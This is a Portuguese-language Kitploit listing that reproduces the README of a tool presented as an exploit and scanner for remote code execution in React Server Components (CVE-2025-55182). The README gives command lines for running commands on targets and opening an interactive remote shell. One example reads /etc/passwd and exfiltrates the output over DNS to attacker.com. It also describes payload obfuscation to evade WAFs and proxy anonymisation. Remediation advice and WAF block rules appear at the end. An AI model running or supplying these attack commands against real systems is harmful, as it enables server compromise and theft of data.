Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Scanner avançado de RCE para React Server Components para CVE-2025-55182. Recursos: fingerprinting multiestágio, verificação de vulnerabilidade, exfiltração via DNS, shell interativo, ofuscação de payload e relatórios profissionais (JSON/HTML/PDF). Apenas para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosBypass de WAFTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Scanner avançado de RCE para React Server Components para CVE-2025-55182. Recursos: fingerprinting multiestágio, verificação de vulnerabilidade, exfiltração via DNS, shell interativo, ofuscação de payload e relatórios profissionais (JSON/HTML/PDF). Apenas para testes autorizados.

Ver Repositório
19há 1 mêsAinda não revisado
Compartilhar

🔐 ReactRCE-Scanner

CVE-2025-55182 — Framework Avançado de Exploração e Avaliação de RCE em React Server Components

Version CVE CVSS Python License

Author
PRs Welcome
Downloads

📑 Índice

  • Aviso Legal e Nota Ética

  • Visão Geral

  • Principais Capacidades

  • Guia de Início Rápido

  • Arquitetura e Análise Aprofundada das Funcionalidades

  • Referência de Configuração

  • Suíte de Testes Automatizados

  • Remediação e Mitigação

  • Contribuição e Comunidade

  • Referências

  • Licença e Autor


⚠️ Aviso Legal e Nota Ética

Esta ferramenta foi projetada exclusivamente para fins EDUCACIONAIS e de TESTES DE SEGURANÇA AUTORIZADOS. A utilização não autorizada deste software contra alvos sem consentimento prévio por escrito constitui uma violação das leis internacionais de crimes informáticos, incluindo o Computer Fraud and Abuse Act (CFAA), as exigências do GDPR e os termos de serviço padrão. O autor e os contribuidores isentam-se de toda responsabilidade por qualquer uso indevido, operações ilegais ou danos consequentes resultantes deste programa. Prossiga estritamente por sua conta e risco.


📋 Visão Geral

O ReactRCE-Scanner é um framework de avaliação e verificação de segurança de nível empresarial, projetado especificamente para o CVE-2025-55182 [1], uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta os React Server Components nas versões 19.0.0 até 19.2.0.

O framework preenche a lacuna entre a pesquisa teórica de vulnerabilidades e a validação prática de segurança. Ao incorporar fingerprinting multiestágio, rigorosa redução de falsos positivos, ofuscação avançada de payloads e geração automatizada de relatórios em múltiplos formatos, ele fornece aos engenheiros de segurança capacidades de diagnóstico precisas.

UsoResultados da Varredura

🎯 Principais Capacidades

Categoria de FuncionalidadeDestaque da ImplementaçãoStatus Operacional
Fingerprinting InteligenteDetecção de framework e versão a partir de múltiplas fontes com algoritmos de pontuação de confiança.✅
Verificação MultiestágioPipeline de validação em 5 estágios projetado para eliminar sistematicamente falsos positivos.✅
Geração de PayloadsConstrutor de payloads ofuscados com suporte a exfiltração via DNS e múltiplas codificações.✅
Shell InterativoExecução de comandos pseudointerativa em tempo real e acesso a shell em alvos verificados.✅
Relatórios AbrangentesGeração automatizada de relatórios nos formatos JSON, HTML, PDF e Markdown.✅
Exfiltração via DNSExfiltração de saída de comandos fora de banda por meio de tratamento seguro de consultas DNS.✅
Motor de ConcorrênciaArquitetura de varredura multithread de alto desempenho para grandes superfícies de ataque.✅
Integração com ProxySuporte a proxy HTTP/HTTPS e SOCKS para tráfego de avaliação anonimizado.✅

🚀 Guia de Início Rápido

Instalação

Clone o repositório e inicialize o ambiente utilizando o script de configuração automatizado ou a instalação manual de dependências:

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Referência Básica de Comandos

O framework opera por meio de uma arquitetura CLI modular com suporte a validação de alvo único, varredura em massa a partir de listas de arquivos, abertura de shell interativo e geração de relatórios de conformidade.

root@kitploit:~
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Arquitetura e Análise Aprofundada das Funcionalidades

1. Motor de Fingerprinting Inteligente

O framework realiza reconhecimento profundo antes da entrega do payload. Ele analisa múltiplos campos de cabeçalho HTTP (X-Powered-By, Next-Action, RSC), meta tags estruturais de HTML (data-reactroot, __NEXT_DATA__), assets de build estáticos e bundles de código-fonte JavaScript [2] [3].

As pontuações de confiança são categorizadas em quatro níveis:

  • CRÍTICO (95%+): Múltiplos indicadores ortogonais confirmam versões vulneráveis do runtime de React Server Components.

  • ALTO (75–95%): Fortes indicadores estruturais identificados com correspondência exata de versão.

  • MÉDIO (50–75%): Marcadores parciais de framework presentes; verificação manual necessária.

  • BAIXO (<50%): Heurísticas fracas detectadas; alta probabilidade de falso positivo.

2. Fluxo de Trabalho de Verificação Multiestágio

Para manter a integridade operacional e evitar interrupções não intencionais de serviço, os payloads passam por um pipeline de validação rigoroso antes que qualquer fase de exploração seja liberada.

root@kitploit:~
Target URL / Endpoint
       │
       ▼
[Stage 1] Framework & Header Detection
       │
       ▼
[Stage 2] Component Version Analysis
       │
       ▼
[Stage 3] Protocol Compatibility Check
       │
       ▼
[Stage 4] Non-Destructive Safe Validation Request
       │
       ▼
[Stage 5] Statistical Confidence Scoring
       │
       ▼
Vulnerability Assessment Decision

3. Ofuscação de Payloads e Evasão

Para testar controles defensivos e Web Application Firewalls (WAFs), o framework incorpora um gerador avançado de payloads com suporte a:

  • Esquemas de Codificação: Transformações em Base64, Hexadecimal e Octal.

  • Ofuscação Estrutural: Divisão dinâmica de strings, injeção de código inútil e mapeamento alternativo do método require.

  • Exfiltração Fora de Banda (OOB): Tunelamento seguro de dados por meio de consultas DNS quando os canais de resposta direta estão restritos.

4. Shell de Comandos Interativo

Após o estabelecimento bem-sucedido da sessão, os operadores podem invocar um ambiente de shell interativo para enumeração pós-verificação.

root@kitploit:~
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.

shell> whoami
www-data

shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux

shell> exit
[*] Terminating session and cleaning up temporary artifacts...

5. Suíte de Relatórios Profissionais

Os relatórios podem ser gerados em múltiplos formatos padronizados (JSON, HTML, PDF, Markdown) contendo resumos executivos, métricas de risco, descobertas técnicas detalhadas, linhas do tempo de evidências e detalhamento da pontuação CVSS v3.1 [4].


⚙️ Referência de Configuração

Os parâmetros avançados são gerenciados por meio do arquivo de configuração config.yaml. Abaixo está um modelo de configuração de produção:

root@kitploit:~
# ReactRCE-Scanner Production Configuration

timeout: 30
threads: 20
max_retries: 3
proxy: null

user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"

headers:
  Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
  Accept-Language: "en-US,en;q=0.5"
  Accept-Encoding: "gzip, deflate, br"

output:
  format: "json"
  directory: "./reports"

logging:
  level: "INFO"
  file: "exploit.log"

exploit:
  obfuscate: true
  encoding: "base64"
  timeout: 60

scanning:
  concurrent_scans: 20
  rate_limit: 0.5
  timeout: 30

fingerprint:
  enable_deep_analysis: true
  follow_redirects: true
  analyze_assets: true

Execute varreduras referenciando o arquivo de configuração personalizado por meio de:

root@kitploit:~
python exploit.py -f targets.txt -C config.yaml -o report.json

🧪 Suíte de Testes Automatizados

O repositório inclui uma suíte abrangente de testes unitários e de integração para garantir a estabilidade dos módulos entre versões.

root@kitploit:~
# Execute the complete automated test suite
python exploit.py --test

# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed

Tests passed: 5/5

Para contribuidores que configuram um ambiente de desenvolvimento local:

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt

# Run pytest unit tests
pytest tests/

# Format and lint codebase
black exploit.py
flake8 exploit.py

🛡️ Remediação e Mitigação

Ações Administrativas Imediatas

  1. Correção: Atualize imediatamente os pacotes React para a versão 19.2.1 ou superior. Atualize as instâncias do Next.js para a versão 15.0.4+ [5].

  2. Monitoramento: Inspecione os logs de acesso HTTP em busca de valores suspeitos no cabeçalho Next-Action e referências de protótipo não validadas (__proto__, constructor) [6].

  3. Reforço de Rede: Restrinja consultas DNS recursivas de saída dos servidores de aplicação para evitar exfiltração de dados.

Regras de WAF de Referência (Nginx / OpenResty)

root@kitploit:~
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
    return 403;
}
if ($request_body ~* "constructor") {
    return 403;
}
if ($request_body ~* "child_process") {
    return 403;
}
if ($request_body ~* "execSync") {
    return 403;
}

📚 Referências

  1. National Vulnerability Database — CVE-2025-55182 Advisory

  2. React Security Documentation & Advisories

  3. Next.js Security Bulletins

  4. FIRST CVSS v3.1 Specification & Calculator

  5. OWASP Guide to Prototype Pollution Vulnerabilities

  6. Node.js Child Process Security Best Practices


🤝 Contribuição e Comunidade

Contribuições, solicitações de funcionalidades e relatórios de bugs são bem-vindos. Por favor, siga o fluxo de trabalho padrão de fork-and-pull request:

  1. Faça um fork do repositório (https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork)

  2. Crie sua branch de funcionalidade (git checkout -b feature/AdvancedScannerModule)

  3. Faça commit das suas alterações (git commit -m 'Add advanced scanning heuristic')

  4. Faça push para a branch (git origin push feature/AdvancedScannerModule)

  5. Abra um Pull Request


📜 Licença e Autor

Distribuído sob a Licença MIT. Consulte LICENSE para mais informações.

Criado com precisão por CerberusMrXi Última Atualização: Agosto de 2026

Baixar ferramenta